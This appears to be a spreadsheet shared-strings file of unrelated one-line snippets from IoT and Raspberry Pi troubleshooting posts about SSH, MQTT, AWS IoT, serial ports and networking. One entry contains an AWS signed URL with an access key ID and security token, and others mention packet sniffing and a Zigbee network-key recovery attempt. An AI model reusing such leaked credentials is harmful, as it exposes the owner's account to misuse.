    <t>So for everyone with the same problem as me, I found a solution:
 for turning on
sudo XAUTHORITY=/home/pi/.Xauthority DISPLAY=:0.0 xset dpms force off for turning off the display in the ssh remote connection.</t>
  </si>
  <si>
    <t>I see this error:
Token auth failed (Device does not exist): ClientID='d:d6acq3:Arduino_Helligkeit:12345678901486464057428',
So you need to check to be sure your connection is using the right device ID that you have registered.</t>
  </si>
  <si>
    <t>As long as the server is running, you can close out of your SSH connection and your program will continue to run with the  command.</t>
  </si>
  <si>
    <t>Creates a new Proxy and starts listening to
the given port.</t>
  </si>
  <si>
    <t>I've put an unlocked sim in it, and the netlight led blinks 3 in 3 seconds meaning its found the network.</t>
  </si>
  <si>
    <t>What it does in first version of "Jessie PIXEL" is open chromium browser on start up after console auto-login and opens the page address:port.</t>
  </si>
  <si>
    <t>The ServerSocket failed to bind to the given IP address, therefore the Socket failed to connect to the Server and therefore no data was transmitted.</t>
  </si>
  <si>
    <t>We have considered using the  command, passing password as "", but have failed -- that may be because of a dumb AP we used (TPLINK), but we are wondering if this is the right approach (sending nothing vs nothing being sent dilemma).</t>
  </si>
  <si>
    <t>FingerPrint sensor could produce picture of fingerprint or template (list of minutiae.</t>
  </si>
  <si>
    <t>From looking at their supplied code they expect this pin to be pulled high giving a 0x77 address.</t>
  </si>
  <si>
    <t>If you execute above code with wrong password, the you will get below output:
In this case, if the file is successfully transferred, then there is no output.</t>
  </si>
  <si>
    <t>If you're not sure if you're already using that SSH Key for anything, you should make a back-up copy and then overwrite the key in order to check if anything is broken.</t>
  </si>
  <si>
    <t>And inside the closed network, whenever one of those URLs are probed, return the expected success message.</t>
  </si>
  <si>
    <t>Also, if you are just getting started, you should be aware that the ESP8266 has some security issues (anyone can just read your code, and hence your wifi password off of the device).</t>
  </si>
  <si>
    <t>I believe that what you're looking for is the Serial Number of the XBee, which is a globally unique, 64-bit address that identifies that device.</t>
  </si>
  <si>
    <t>A socket
connection will be established by the constructor, which expects a
host, port, user name and password as arguments.</t>
  </si>
  <si>
    <t>/etc/rc.local it fails because it is using frame buffer happens before login
Setup in crontab with @reboot happens before login
systemctl same thing runs before login.</t>
  </si>
  <si>
    <t>I am trying to load fingerprint templates from the external source fingerprint sensor R305 for checking.</t>
  </si>
  <si>
    <t>I am trying to find a way to run 2 services that uses MAC addresses as unique networkIDs on my SmartThings hub (cast-web-api and MQTT-Bridge)
Right now, I built a docker-compose.yml file that does what I need but I would like to bridge my eth0 to 2 different MAC addresses on the containers.</t>
  </si>
  <si>
    <t>To prevent reply attack, generate a one time ID on client, then check on server that this ID is only used once (you do store all send email requests, right?)</t>
  </si>
  <si>
    <t>In the APIs Console, a project is a named collection of information about your application:  
auth information
team members' email addresses
the Google APIs that your application uses
and so on.</t>
  </si>
  <si>
    <t>If you use our data, youll need to read the data license  but it only says that if you collect new fingerprints, you have to contribute them back to the community.</t>
  </si>
  <si>
    <t>In both cases, the client creates a TCP control connection from a random unprivileged port N to the FTP server command port 21.</t>
  </si>
  <si>
    <t>I can feed it my Email and Password, but I have no idea what to do with the TLS_fingerprint,
and end up with 'TLS handshake failed'
I am a total Newb, in over my head, but if I can get this to work it would be great.</t>
  </si>
  <si>
    <t>Once you get the IP address you communicate with the device to get necessary details like product id, DSN and code challenge after receiving these you will start communicating with amazon servers until you get the Authentication tokens.</t>
  </si>
  <si>
    <t>Login on your router management interface and (if it has this feature, most do have it) reserve a DHCP address on the router for your selected client, so that the specific client always has the same IP address.</t>
  </si>
  <si>
    <t>if (bytes.b==-22){
          if (bytes.c==2212.113){
             if (bytes.d==-3131.111){ //If the password is right
                Serial.write((const uint8_t*)&amp;values,sizeof(values)); //Write 
//struct to Serial port.</t>
  </si>
  <si>
    <t>With IPv6 your devices could use neighbour discovery to automate past the MAC entry to the Internet Protocol, and its possible to connect between devices using their link-local address (fe80::some:thing) 
Wifi carries packets of data, that have addresses.</t>
  </si>
  <si>
    <t>This attack may lead to the disclosure of confidential data, denial of service, port scanning from the perspective of the machine where the parser is located, and other system impacts.</t>
  </si>
  <si>
    <t xml:space="preserve">
i need to keep run my Python Program in Background on my Raspberry Pi after i close the ssh connection, Because i need to save Phidget information on a SQL DB
I try to do this with nohup but it seems that the python Program isn't even executed.</t>
  </si>
  <si>
    <t>I need a good tutorial that will explain on how to setup a ssh connection via a direct ethernet connection to a  Raspberry Pi with a static IP running Arch Linux.</t>
  </si>
  <si>
    <t>the generated mqtt endpoint with sigV4 signing looks like this : 
wss://a2mt3pd9aiue3c.iot.ap-southeast-1.amazonaws.com/mqtt?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;X-Amz-Credential=ASIAIPXKPMB3YECA4IWQ/20170730/ap-northeast-1/iotdevicegateway/aws4_request&amp;X-Amz-Date=20170730T132924Z&amp;X-Amz-SignedHeaders=host&amp;X-Amz-Signature=b67e19aa6a16703756b0fed6f60649e687ca2494ad23e0b28e0d6ba624b53fdb&amp;X-Amz-Security-Token=yyy//////////bbb/xxx+PV2/YEn3Li8b/T7+hVm6v5HJBu6fSqiMFk8ReLIJYqRKb6dCVvKjow3ioGIVtTMs5dABg9rHmSH1Q4y1RZaje4pNjTakTbgb2uhnQ4AjNrlgb75WQxsckXEDr7QKy5+lWWO6C/tU3+kymk8KCBYBq1yoq5GOBlc9BdajwsrLOdDLozmIsaarqlSMQ/iS/SOoNmx7AK733hxUEU5ovaXKY5ffLRbJm+JqVxI+0zJP4Q4fHGX4f2qkQBUCzmLl454fKanmGk3yXoO0FH2jlcztoqGirvBAiP//////////8BEAAaDDUzODEwNjcxOTUxNSIMoUem00KSLGQAkZRxKsME5hnmdjdZVMQHgcc+gHRFraUqOwUJ0l4g/rUMzQVythsplcDOQ1gqFtAUiNm4Oy520ubgJylOHBSmzc+Zqjyd42Mh2a5kF1vj0FxwPpVJrzxEV1yRS6nLs6D6XMAaKZPrz0zMDriKI77LKyyBwtSBlI9ENILzYrGwe+i5K04TyYRJSZBszOZXtCVwDYQUJTwMzfNWY4R0UhyjC9/xxx+P/lWwxxA4FVVlWcc+xV8Fwjpem4/yl6eH0YmHhPrAAvQDAq+euBlbDJL5aV8czUQulowEJum6oVocngqP2W2zwid1fJT2C3xnVySZEHLrUZ7aULD6VswvzmKqmE9RBPE3+lPgsOKtGzw/BtdQYQmHsggqA8C7omwAzwUNAqa4/uVYGNdXUDUxytq9J2qFUeh74o0c/QsyUMcgsK/3hJySiMj+M7TuPTTAhCnf5WS3wL9dMjLsis88wGFbkUnOVS0N3hpFGLoIpc/EWy7hnbYZDJiLG9B02SiLtshZBc6D+somethingsomething+gVd7jdk0K6wMFwJ3Xc4tFoDzps13eszpMEfrMGGQSdKK7dFfwfMLO+98sF
the code fragment is this:
And it fails with :
Can anyone suggest what needs to be done?</t>
  </si>
  <si>
    <t>I am trying to understand if AWS IOT can help me establish a direct web socket connection from lets say my laptop to a device both having private addresses via internet.</t>
  </si>
  <si>
    <t>I think AWS IOT has a way to create a direct web socket connection b/w lets say my laptop with a private ip address to the device with private address?</t>
  </si>
  <si>
    <t>This loop also seems to block my GPIO event handler for some reason and pressing the STOP button goes undetected (have to cancel the script to stop).</t>
  </si>
  <si>
    <t>When i unplug the Ethernet cable and try to build SSH connection via WiFi it doesn't succeed and when i ping it prompts request time out.</t>
  </si>
  <si>
    <t>This means server is deliberately disconnecting the connection, either you can increase the time it sleeps or you can add a unique user-agent in the header each time.</t>
  </si>
  <si>
    <t>The problem is the Arduino is not being detected on win iot so serial communication is impossible because no serial port exists from the iot point of view.</t>
  </si>
  <si>
    <t>PuTTYcyg is a patched version of PuTTY that, in addition to telnet, rlogin, ssh, and serial connections, can also be used as a local Cygwin terminal instead of the Windows console or xterm.</t>
  </si>
  <si>
    <t>If the hostname or IP address form is used then the user must specify the -u option and either the -P of -p options to specify an administrative user and password on the remote host to authenticate with to the remote host.</t>
  </si>
  <si>
    <t>Transport layer - Flow control and error correction methods are in that layer to ensure the reliability of data transmission, also traverse the host-to-host connections.</t>
  </si>
  <si>
    <t>an explicit receipt from the destination of the data), retransmission of missing and/or damaged packets (usually initiated by a time-out), and checksums to provide that reliability.</t>
  </si>
  <si>
    <t>If the user inputs 2 correct forms of ID (example pin and correct card swipe) then the door will open, but I want to send a message to alert me if someone's access is denied.</t>
  </si>
  <si>
    <t>The Bluetooth module has the advantage of beeing wireless for both, the Arduino and the phone, and using the Ethernet-shield you could make the Arduino worldwide accessible by using port-forwarding on your firewall.</t>
  </si>
  <si>
    <t>I am talking especially about those interactive commands that bypass the STDOUT and send their output directly to the tty (, ftp... which typically prompt for a password and wait until the user types it).</t>
  </si>
  <si>
    <t>Performing a mqtt:close() previously to the reconnection, should be safe, but if I send it and the client is truly disconnected, the node resets without any reason (known to me).</t>
  </si>
  <si>
    <t>But you also have to deal with the fact that bad data was probably sent to the Arduino and you need to detect this and fix it, and also reinitialize Wire (and in my case the servo driver), so that even though Pi got an error, that the data will continue to get through and be usable.</t>
  </si>
  <si>
    <t>You'll likely need to setup dynamic dns for your 192.168.10.1 device (or some device, say an always on PC, if it's behind the same router as the previously mentioned device) and open up firewall rules to communicate with your Dynamic DNS provider.</t>
  </si>
  <si>
    <t>After some research I found this 2 things 
1) SSL handshake fail when using new endpoint with '-ats' or '.ats'  here
2) Its gives issue in higher version (IOS 12.1.1) so check your device version.</t>
  </si>
  <si>
    <t>Unfortunately when I do I get the following error in the console:
Udev: Failed to write to /sys/class/input/input3/uevent
Check that you have permission to access input devices
Cannot open display
I have no idea how to fix that.</t>
  </si>
  <si>
    <t>As long as Android receives the expected success message back from its requests to client3.google.com, it will assume it is not behind a captive portal, and not prompt you to login.</t>
  </si>
  <si>
    <t>Conceptually, you execute an ssh client locally on the game client configured to open a local port on the game client, and forwards packet recieved on that port to a remote port on the ssh server.</t>
  </si>
  <si>
    <t>I can get it connected to my Macbook and it sends keystrokes.</t>
  </si>
  <si>
    <t>One of them is conected to RPI and receives RSSI and hardware-address from other device.</t>
  </si>
  <si>
    <t>At the moment the Pi is refusing SSH connections, so the only access I have is via my mac's SD card reader.</t>
  </si>
  <si>
    <t>no serial port access etc.</t>
  </si>
  <si>
    <t>Arduino and my PLC are connected just by using Tx and Rx pin no handshake is done.</t>
  </si>
  <si>
    <t>Till now I used "weaved" servicess but after disconnected I  always have to login on weaved.com and get ip address.</t>
  </si>
  <si>
    <t>I can ssh into the pi still over wifi and when I run nc -zv my.hostname.com 80  it says that the connection succeeded.</t>
  </si>
  <si>
    <t>is there a way to inject that pin when i attempt to connect?</t>
  </si>
  <si>
    <t>Of course I reconnected my sensor to this pin.</t>
  </si>
  <si>
    <t>I am trying to setup an IoT AWS on my raspberry pi and when I try and describe my certificate it says it couldn't reach the endpoint URL iot.west.amazonaws.com.</t>
  </si>
  <si>
    <t>* In the method onOpen, we'll let the user know that the handshake was 
     * successful.</t>
  </si>
  <si>
    <t>I am not able to get the GPIO pin data without sudo access.</t>
  </si>
  <si>
    <t>I want to get MAC address of remote raspberry using his IP address.</t>
  </si>
  <si>
    <t>I am getting this WebSocket Handshake Error when I try to connect to AWS IOT using aws-iot-python-sdk.</t>
  </si>
  <si>
    <t>I would like to close the login dialog after login success such as using gtk_main_quit().</t>
  </si>
  <si>
    <t>When I run ifconfig, I see under eth0 that it has another ip address and mask.</t>
  </si>
  <si>
    <t>I don't have an username/password kind of thing, nor a IP address and a port.</t>
  </si>
  <si>
    <t>However, if I hardcode in the device address I see in bluetoothctl, I am actually able to connect.</t>
  </si>
  <si>
    <t>Most pins are reserved by the system and cannot be accessed from usermode.</t>
  </si>
  <si>
    <t>In your code:
Must match your Ethernet Shield mac address.</t>
  </si>
  <si>
    <t>From the datasheet the SDO pin is what determins the address of your sensor.</t>
  </si>
  <si>
    <t>It was in serial port spamming.</t>
  </si>
  <si>
    <t>I don't see a way on your code to ascertain if connection was established.</t>
  </si>
  <si>
    <t>No need for wifi triangulation or crazy sensor setups in my opinion.</t>
  </si>
  <si>
    <t>When Avro is used in RPC, the client and server exchange schemas in the connection handshake.</t>
  </si>
  <si>
    <t>As far as I am aware, the master device that has initiated SLA+R is the only party allowed to NACK a packet.</t>
  </si>
  <si>
    <t>Serial monitor with Dragino LG01
Ssh connection with Dragino LG01</t>
  </si>
  <si>
    <t>Also, because you don't check the descriptor is valid, you didn't debugged that after the 144 open it was giving error.</t>
  </si>
  <si>
    <t>After that i have converter this into dcf using zbconvert, but when i try to find network key using Zbdsniff, it process 2 files (.dump and .dcf) but it don't find any network key.</t>
  </si>
  <si>
    <t>Light bulb moment ;) So we going to keep our TCP channel open and will get the unit to help auth over this channel.</t>
  </si>
  <si>
    <t>The esp-open-rtos has plenty examples for doing SSL connections, but SSH or SFTP is not implemented yet.</t>
  </si>
  <si>
    <t>Stub does not validate the function, bu I would expect "input", "output" to be used.</t>
  </si>
  <si>
    <t>This lib allows you to monitor permissions, check them in background and as well ask for a permission in easy way (callback).</t>
  </si>
  <si>
    <t>It seems that serial monitor unlock connection so later i can use my program.</t>
  </si>
  <si>
    <t>Is there some bot that scans every port on every IP address in the world?</t>
  </si>
  <si>
    <t>I expect the output on the raspberry pi side to be decrypted properly</t>
  </si>
  <si>
    <t>First, the "Access is denied" error is caused by the Serial Monitor holding the port.</t>
  </si>
  <si>
    <t>Problem is that message sent in step 5 is not acknowledged by the broker.</t>
  </si>
  <si>
    <t>, the Firewall on the Mac is off, port 5000 is open, and the IP address and port being called to is correct.</t>
  </si>
  <si>
    <t>first try to open the arduino IDE and see on there if your board was detected in some COM Port.</t>
  </si>
  <si>
    <t>The only option I've found is to poll  and loop through the registered devices to see if they are connected or not.</t>
  </si>
  <si>
    <t>Wehn I try to verify the server using client.verify(fingerprint, host), I get an error saying the server could not be identified, but it definitely is the right fingerprint.</t>
  </si>
  <si>
    <t>Now you can also:
access the Internet from the PI through your Ubuntu's Wifi connection
open a VNC to get rid of the display as well: https://raspberrypi.stackexchange.com/questions/14611/how-to-set-up-raspberry-pi-without-a-monitor/54393#54393
UART serial USB converter
This is an alternative to SSH if you just want to get a shell on the Pi: https://en.wikipedia.org/wiki/Serial_port
This does not use SSH or networking itself, but rather the older, simpler, more direct, more reliable, lower bandwidth, lower distance serial interface.</t>
  </si>
  <si>
    <t>Did you already checked if the port 8080 is open to external access in your internet router?</t>
  </si>
  <si>
    <t>In summary:
For safety, it is difficult to start a connection to a device on another local network.</t>
  </si>
  <si>
    <t>In any case, I would complement your hardware debounce with software debounce.</t>
  </si>
  <si>
    <t>If you open up your firewall on 80 and/or 443 to your Apache web server, apache could redirect to the backed 8080 port.</t>
  </si>
  <si>
    <t>This happens no matter which user (even root) executes it and access rights for the serial port have been checked, too.</t>
  </si>
  <si>
    <t>I am trying to manually start and stop the fan when needed but I am getting this error when trying:
ValueError: The channel sent is invalid on a Raspberry Pi
Here is my code that I am executing as root.</t>
  </si>
  <si>
    <t>Now I have to connect any 2 temperature sensors and make them collect the data and then feed it to a simulator ( Omnet++ Preferable) securely.</t>
  </si>
  <si>
    <t>However, the reading works as expected, this is what I get through the Serial Console:
As you can see, the construction of the password2 and ssid2 char array is producing trash and the connection doesn't work.</t>
  </si>
  <si>
    <t>Jan 11 16:03:46 al sh[949]: modprobe: **FATAL: Module dcm2835_wdt not found in directory /lib/modules/4.9.59-v7+**
Jan 11 16:03:46 al systemd[1]: watchdog.service: Control process exited, code=exited status=1
Jan 11 16:03:46 al systemd[1]: Failed to start watchdog daemon.</t>
  </si>
  <si>
    <t>Exception (3) is raised in the Serial Monitor whenever i access
the IP address of the ESP on the web browser.</t>
  </si>
  <si>
    <t>It's not clear if we have to actually capture scanned devices in the whitelist for the scan to succeed (goes by too fast to catch and stop).</t>
  </si>
  <si>
    <t>However now that the program is at the point where it is attempting an SSL handshake with the server mbedtls is failing to verify the certificate that I supplied against the servers certificate.</t>
  </si>
  <si>
    <t>This a native code in Ionic 4 + Capacitor plugin
Status is Connecting then Reconnecting...
Reconnecting keeps getting printed in the Logcat
Please indicate me why this is failing to connect when the auth with AWS Cognito is working perfectly fine.</t>
  </si>
  <si>
    <t>The lavfi device will only output decoded frames, so you need to directly use the input file to avoid re-encoding.</t>
  </si>
  <si>
    <t>So what am I doing wrong that the original data sent via USB is not as valid as actual data that arrives?</t>
  </si>
  <si>
    <t>In a specific case to this problem the private connection also has a specific DNS that needs to be set.</t>
  </si>
  <si>
    <t>Basically, all the DHCP stuff (the code that assigns the dynamic IP address) is baked-in to the firmware for the WiFi shield, and this code is not open, so you cannot update it.</t>
  </si>
  <si>
    <t>Actually the solution is two-fold:
The BCM2835 datasheet does not advertise physical addresses in their datasheet:
Physical addresses range from 0x20000000 to 0x20FFFFFF for peripherals.</t>
  </si>
  <si>
    <t>Well, the crash likely originates from the fact that you're trying to access the  variable when it is null in the case the connection to your server could not be established.</t>
  </si>
  <si>
    <t>Please be aware that the "host" argument of verify() must match the certificate common name (in your case  *.github.com or api.github.com):
Test: 
Output: 0 s:/C=US/ST=California/L=San Francisco/O=GitHub, Inc./CN=*.github.com</t>
  </si>
  <si>
    <t>&lt;3
edit: 
I see that the Ip address of the Raspberry in the App was wrong so now is correct and I my app is blocked in the same way like ethernet connection.</t>
  </si>
  <si>
    <t>With bluetoothct I can make the device discoverable, pair it with another device, but I haven't found the way to set a pin like with bluetooth-agent
Bluetooth-agent is no more available on my system, is there a way I can do that with bluetoothctl?</t>
  </si>
  <si>
    <t>I did search the web for "ESP32 WLAN WPS reconnect" and similar terms, but did find only reconnect strategies for non-wps (SSID + password) connections.</t>
  </si>
  <si>
    <t>Android devices which are scanning can pick up the short advertised data packet broadcasted by a device called a 'beacon'.</t>
  </si>
  <si>
    <t>There, the board gets recognized as a USB serial port under 'Unknown devices' (first as something else, I think it was a code with two uppercase letters and then four digits, but I'm not sure and I can't get that name back, even after uninstalling the drivers).</t>
  </si>
  <si>
    <t>After going through some debugging messages, I found that the problem is that when the DWC is enumerating the devices, it will try to read the device descriptor of, what I am guessing is, the on-board USB hub/ethernet device (LAN7515), but it will return a transfer error, and then therefore is unable to enumerate the device.</t>
  </si>
  <si>
    <t>Central devices initiate and control data transfers, peripherals advertise their presence and wait for a central to tell them what to do.</t>
  </si>
  <si>
    <t>):
conflicts with
So I'd recommend double-checking your pin use and connections (also,  providing this information would increase your chances of somebody spotting an error).</t>
  </si>
  <si>
    <t>I was also able to set up the Apache SSL proxy for the two requests (one to arm the webcam alarm and another to disarm it) so, if need be, I can send those requests over the Internet now securely.</t>
  </si>
  <si>
    <t>Clicking the "Create" button on the "New output" blade only sends a request to ensure the uniqueness of the Output alias and the validity of the Storage account key.</t>
  </si>
  <si>
    <t>Current time: Sat Oct 14 02:26:25 2017
Attempting MQTT connection...connected
This is good and it is exactly what I wanted but I'm confused by how my Wemos D1 is able to connect to port 8883 without it verifying the certificate chain of the server?</t>
  </si>
  <si>
    <t>I have created a smart switch using NodeMcu Esp8266 wireless chip and programmed Websocket to create a TCP protocol to communicate.</t>
  </si>
  <si>
    <t>"In order to avoid hard-coding of WiFi credentials, I have used WiFi Manager library so that we can create one SSID which will be shown in available networks.</t>
  </si>
  <si>
    <t>The documentation about run_command states that:
function will return after connection and authentication establishment and after commands have been sent to successfully established SSH channels.</t>
  </si>
  <si>
    <t>Do that with the following command:
scp ~/.ssh/id_rsa.pub user@remote.host:pubkey.txt
Make sure to replace user with a username on the Raspberry Pi and remote.host with the IP address of the Pi.</t>
  </si>
  <si>
    <t>Note that the PHP script won't listen just to your Arduino but to anyone sending a request to it, so you should make sure that you can trust the passed-in data before storing it in the database.</t>
  </si>
  <si>
    <t>Sniffing is an eavesdropping attempt which consists of capturing packets transmitted through a third party network and reading the data in search of confidential information.</t>
  </si>
  <si>
    <t>See https://unix.stackexchange.com/q/249654
Thewatchdog did not stop!line is normal behavior.systemdsets a "hardware watchdog" timer as a failsafe, to ensure that if the normal shutdown process freezes/fails that the computer will still shutdown after the specified period of time.</t>
  </si>
  <si>
    <t>Scanning procedures, such as ping sweeps and port scans, return information about which IP addresses map to live hosts that are active on the Internet and what services they offer.</t>
  </si>
  <si>
    <t>An internet socket address is the combination of an IP address (the location of the computer) and a port (which is mapped to the application program process) into a single identity, much like one end of a telephone connection is the combination of a phone number and a particular extension.</t>
  </si>
  <si>
    <t>backData is checked against the key for user1, matching.</t>
  </si>
  <si>
    <t>backData is checked against the key for user1, not matching.</t>
  </si>
  <si>
    <t>You could find out your IP address when the dongle is connected however that's impractical.</t>
  </si>
  <si>
    <t>I have a ssh connection via putty and a RDP connection.</t>
  </si>
  <si>
    <t>So when the certain value for key gets sent to the arduino, it changes.</t>
  </si>
  <si>
    <t>Both can be connected in peer-to-peer network using wifi.</t>
  </si>
  <si>
    <t>This is my code:
everithing seems to be ok, but on my server, no incoming connections are detected.</t>
  </si>
  <si>
    <t>My app sends a 32 byte md5 hash back to the Arduino.</t>
  </si>
  <si>
    <t>I am trying to establish an SSH connection using the Ganymed library.</t>
  </si>
  <si>
    <t>Is it possible to determine a device's IP address from its MAC address over a local network?</t>
  </si>
  <si>
    <t>I am trying to establish a TCP socket connection between the two.</t>
  </si>
  <si>
    <t>I have set up scapy on linux (raspian on RPI) for sniffing WiFi packets using WiFi adapter (b/g) in monitor mode.</t>
  </si>
  <si>
    <t>All 4 analog pins AD0, AD1, AD2, AD3 are enabled, only AD1 is connected to something.</t>
  </si>
  <si>
    <t>I had no problem uploading codes to my arduino for a while, then I found some weird issue.</t>
  </si>
  <si>
    <t>The Arduino waits until it receives the key which is one digit.</t>
  </si>
  <si>
    <t>Now this is the arduino/computer exchange:
The arduino sends a RST packet, but my server goes on to send it the greeting and login prompt.</t>
  </si>
  <si>
    <t>I assume that my BT module works fine beause if it wouldn't I couldn't establish connection with any other devices.</t>
  </si>
  <si>
    <t>However the connection is established only when the two devices are paired.</t>
  </si>
  <si>
    <t>In dev i use fake sensor data instead of the pins.</t>
  </si>
  <si>
    <t>But as soon as I enable authentication, I get a "connection refused".</t>
  </si>
  <si>
    <t>I'm trying to establish a connection over SSH from my Win 8.1 laptop to my raspberry pi 3 model B as the host.</t>
  </si>
  <si>
    <t>After I ran the raspi-config and enabled the ssh I now get a Connection closed by 192.168.0.31.</t>
  </si>
  <si>
    <t>Additionally, I want to use a SSH connection.</t>
  </si>
  <si>
    <t>So when tennis ball is detected, I just need to send 1 signal until the ball is out of frame.</t>
  </si>
  <si>
    <t>Here's my code:
The I2C protocol clearly works, or I would not get acknowledged address and I tried both potentiometers, both wipers, writing, incrementing and decrementing.</t>
  </si>
  <si>
    <t>As soon as the door is closed, the buzzer will stop.</t>
  </si>
  <si>
    <t>It connects to server without using sensor codes but when I add sensor codes it is not connected.</t>
  </si>
  <si>
    <t>Would I need to make a server that would listen for the keycodes being sent to the pi?</t>
  </si>
  <si>
    <t>I am trying to establish a connection between my device and the AWS IoT service using TLS 1.2 authentication via MQTT Client.</t>
  </si>
  <si>
    <t>BTW: The User Authentication (AWS-Cognito) is successful, i'm receiving all needed credentials.</t>
  </si>
  <si>
    <t>Also the device still thinks it's connected and does not recover the connection.</t>
  </si>
  <si>
    <t>This error occurs when I try to establish a connection on my laptop over LAN.</t>
  </si>
  <si>
    <t>The sending and receiving node codes I used are below:
Sender Node
Receiver Node</t>
  </si>
  <si>
    <t>I've also tried to add 'Port 22' and 'Port 3322' in the Pi's SSH configuration file.</t>
  </si>
  <si>
    <t>i m using PIR sensor to find out intruder is present or not.</t>
  </si>
  <si>
    <t>However, I am wondering how I would go about doing that if my wifi network changes the password to access the wifi?</t>
  </si>
  <si>
    <t>I then connected to the Wifi successfully (the wifi LED is on).</t>
  </si>
  <si>
    <t>To discover the IP address of the server, I'm trying to use UDP broadcasting on the NodeMcu module.</t>
  </si>
  <si>
    <t>It send data after receiving from remote as REMOTE_ID:KEY_NUMBER.</t>
  </si>
  <si>
    <t>When first one is connected to broker 2nd one gets disconnected.</t>
  </si>
  <si>
    <t>172.27.232.XXX
Now from the remote user I can ping the Pis 172.xxx.xxx.xxx IP address and even SSH into it using the 172 address.</t>
  </si>
  <si>
    <t>I have an ESP8266 sketch that will allow users to input their ip address and password and their thingSpeak write api when they power up the device (ESP8266 connected to Arduino UNO v3).</t>
  </si>
  <si>
    <t>Unfortunately the device is not connected to wifi all the time.</t>
  </si>
  <si>
    <t>If on the other hand you wanted to be able to establish communication between any two Digi XBee 802.15.4 modules you'd need to use unicast addressing.</t>
  </si>
  <si>
    <t>Are you sure that your serial ports are valid?</t>
  </si>
  <si>
    <t xml:space="preserve">
Is there any way to "mark" the information I send with Serial
Definitely.</t>
  </si>
  <si>
    <t>Using port 200 for now:
I am still looking for a port 80 permission error solution though.</t>
  </si>
  <si>
    <t>if((gsmAccess.begin(PINNUMBER)==GSM_READY) &amp;
    (gprs.attachGPRS(GPRS_APN, GPRS_LOGIN, GPRS_PASSWORD)==GPRS_READY))
Should be if((gsmAccess.begin(PINNUMBER)==GSM_READY) &amp;&amp; (DOUBLE &amp;)
    (gprs.attachGPRS(GPRS_APN, GPRS_LOGIN, GPRS_PASSWORD)==GPRS_READY))</t>
  </si>
  <si>
    <t>http://arduino.cc/en/Tutorial/SecretsOfArduinoPWM
edit: i've missed you are using ICR1 as TOP and OCR1A as counter.</t>
  </si>
  <si>
    <t>An SSH server, by default, listens on the
  standard TCP port 22.</t>
  </si>
  <si>
    <t>It's possible you're being denied access to the serial port.</t>
  </si>
  <si>
    <t>Ports under 1024 are considered "Privileged Ports."</t>
  </si>
  <si>
    <t>These pins indicate that the other therminal is conected (Data Terminal Ready).</t>
  </si>
  <si>
    <t>In this example if you send 0x33 then your device have to send 0x8A to identify itself.</t>
  </si>
  <si>
    <t>If they do, you'll have to access from the internet via a non-blocked port, and forward that port to your rasp pi.</t>
  </si>
  <si>
    <t>If you're sensor is not connected, it will still send data, but it will be invalid and unusable.</t>
  </si>
  <si>
    <t>The only method to achieve a connection would be if one device has a routable IP address.</t>
  </si>
  <si>
    <t>This is being initialised to address 255.255.255.255, which is not a valid IP address.</t>
  </si>
  <si>
    <t>Nothing will be logged, nor the traps counter in  will be incremented.</t>
  </si>
  <si>
    <t>You have to provide a address mask, if you want to access it over the local network.</t>
  </si>
  <si>
    <t xml:space="preserve">
First of all, make sure your LED is properly connected.</t>
  </si>
  <si>
    <t>Because it will be no DHCP server on your network, youll have to setup IP addresses manually.</t>
  </si>
  <si>
    <t>It was verified to work by allowing connections from any host.</t>
  </si>
  <si>
    <t>Advised to lock it back down to the connecting host.</t>
  </si>
  <si>
    <t>Pins BCM14 and BCM15 expose the serial debug console.</t>
  </si>
  <si>
    <t>At the end of https://www.arduino.cc/en/Guide/Linux there is section on permissions for the serial port.</t>
  </si>
  <si>
    <t>I could hence establish a  ssh connection.</t>
  </si>
  <si>
    <t>If you go the USB route the serial devices are enumerated under .</t>
  </si>
  <si>
    <t>You can use another device as a gateway, this device is networkable and has serial port.</t>
  </si>
  <si>
    <t>Taht way you can use the USB port to send debug coms to your computer.</t>
  </si>
  <si>
    <t>The serial device that you can communicate with must be an FTDI device.</t>
  </si>
  <si>
    <t>The first is in setup:
This Fwd is local to setup.</t>
  </si>
  <si>
    <t>Only I-frames (also known as key-frames) can be decoded standalone.</t>
  </si>
  <si>
    <t>An IoT Central operator must approve the device before it can stat sending data.</t>
  </si>
  <si>
    <t>Xshell is a terminal emulator that supports SSH, SFTP, TELNET, RLOGIN and SERIAL.</t>
  </si>
  <si>
    <t>A Media Access Control address (MAC address) is a unique identifier assigned to network interfaces for communications on the physical network segment.</t>
  </si>
  <si>
    <t>Auth tokens are normally reusable and cached by AccountManager, but must be refreshed periodically.</t>
  </si>
  <si>
    <t>DbCharmer is a ruby gem for implementing connection switching and sharding with ActiveRecord.</t>
  </si>
  <si>
    <t>How do I validate an email address?</t>
  </si>
  <si>
    <t>This interface does not provide a way for you to verify whether emails were actually sent.</t>
  </si>
  <si>
    <t>AutoDetect firmware...
Can't autodetect firmware, because proper answer not received.</t>
  </si>
  <si>
    <t>It has direct forward proxy to convert coap packets to https packets and vice versa.</t>
  </si>
  <si>
    <t>You can issue the command: 
Replace  with the Pi's username, replace  with the password, and that path to shutdown (which you can find while connected to the Pi do which shutdown).</t>
  </si>
  <si>
    <t>Now, if we repeat the exact same steps as above, but this time we don't ssh into the Pi and track what's going on, the Pi is never able to connect.</t>
  </si>
  <si>
    <t>Appears i needed to send though some data first to make it register the port is open.</t>
  </si>
  <si>
    <t>I also tried sending a malformed LESetScanParameters packet, and leaving out the commands GapDeviceInit, SetEventMask and LESetEventMask, but that didn't change anything.</t>
  </si>
  <si>
    <t>I have an ssh session open to the Pi and this session never fails, even when the script fails.</t>
  </si>
  <si>
    <t>This is what my monitor is printing:
As you can see, I'm missing something that'll properly decrypt the encryptText!</t>
  </si>
  <si>
    <t>When you press one time the commission button: the module sends a node identification broadcast transmission.</t>
  </si>
  <si>
    <t>On Serial monitor I am getting a message of a Wifi shield not present.</t>
  </si>
  <si>
    <t>Edit:
Please find the command that I used to connect Ditto and Kafka
I have registered a device using Hono and I am sending the data to Ditto.</t>
  </si>
  <si>
    <t>If the build fails a gated-check-in, the check-in is rejected.</t>
  </si>
  <si>
    <t>I can't find any other errors in the other logs that indicate what's causing the device registration fail, or even what call is failing.</t>
  </si>
  <si>
    <t>Edit: so The solution was that you can't automatically host on port 80 without root.</t>
  </si>
  <si>
    <t>Once a user input was detected a servo mechanism needs to open and then close.</t>
  </si>
  <si>
    <t>The most common cause of Access Denied errors on COM ports is the COM port already being opened by some other program.</t>
  </si>
  <si>
    <t>The exact reason why this is the case can be found in the logs (network issue, security issue, etc.</t>
  </si>
  <si>
    <t>When I first started it, my script was arranged like KT Work's script with the initial login authorization outside of the main loop.</t>
  </si>
  <si>
    <t>in case of network error)
